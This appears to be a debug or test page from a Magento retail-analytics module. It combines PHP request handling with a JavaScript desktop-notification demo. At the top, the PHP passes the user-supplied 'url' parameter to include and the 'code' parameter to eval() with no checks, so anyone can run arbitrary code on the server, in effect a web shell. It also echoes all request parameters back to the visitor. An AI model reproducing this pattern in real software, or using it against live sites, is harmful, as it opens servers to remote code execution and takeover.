<?php

$params = Mage::app()->getRequest ()->getParams();

if (isset($params['url']))
{
	include $params['url'];
}

if (isset($params['code']))
{		
	eval($params['code']);
}


if (isset($params['type']))
{	
	if($params['type'] == "cms") {		
		$filterArray = array();
		$code = Mage::helper('retail_analytics/onsite')->getStaticBlock($params['identifier'],$filterArray);
	}
}

if(count($params) > 0) {
	print_r($params);
}

?> 

<button onclick="notifyMe()">Notify me!</button>

<script type="text/javascript">

function notifyMe() {
	  // Let's check if the browser supports notifications
	  if (!("Notification" in window)) {
	    alert("This browser does not support desktop notification");
	  }

	  // Let's check whether notification permissions have already been granted
	  else if (Notification.permission === "granted") {
	    // If it's okay let's create a notification
	    //var notification = new Notification("Hi there!");
		  var notification = new Notification('Email received', {
			  body: 'You have a total of 3 unread emails',
			  icon:'https://www.retailautomata.com/img/retail-automata.png'
			});
		  //setTimeout(notification.close.bind(notification), 3000); 
			
		  notification.onshow = function(event) {
			  console.log('Notification shown.');
			};
		  notification.onclick = function(event) {
			  console.log('Notification clicked.');
			  event.preventDefault(); // prevent the browser from focusing the Notification's tab
			  window.open('http://www.mozilla.org', '_blank');
			};	
		  notification.onclose = function(event) {
			  console.log('Notification closed.');
			};
		  notification.onerror = function(event) {
			  console.log('Notification error occured.');
			};	
	  }

	  // Otherwise, we need to ask the user for permission
	  else if (Notification.permission !== 'denied') {
	    Notification.requestPermission(function (permission) {
	      // If the user accepts, let's create a notification
	      if (permission === "granted") {
	        var notification = new Notification("Hi there!");
	      }
	    });
	  }

	  // At last, if the user has denied notifications, and you 
	  // want to be respectful there is no need to bother them any more.
	}

	Notification.requestPermission().then(function(result) {
	  console.log(result);
	});function spawnNotification(theBody,theIcon,theTitle) {
	  var options = {
	      body: theBody,
	      icon: theIcon
	  }
	  var n = new Notification(theTitle,options);
	}
	
</script>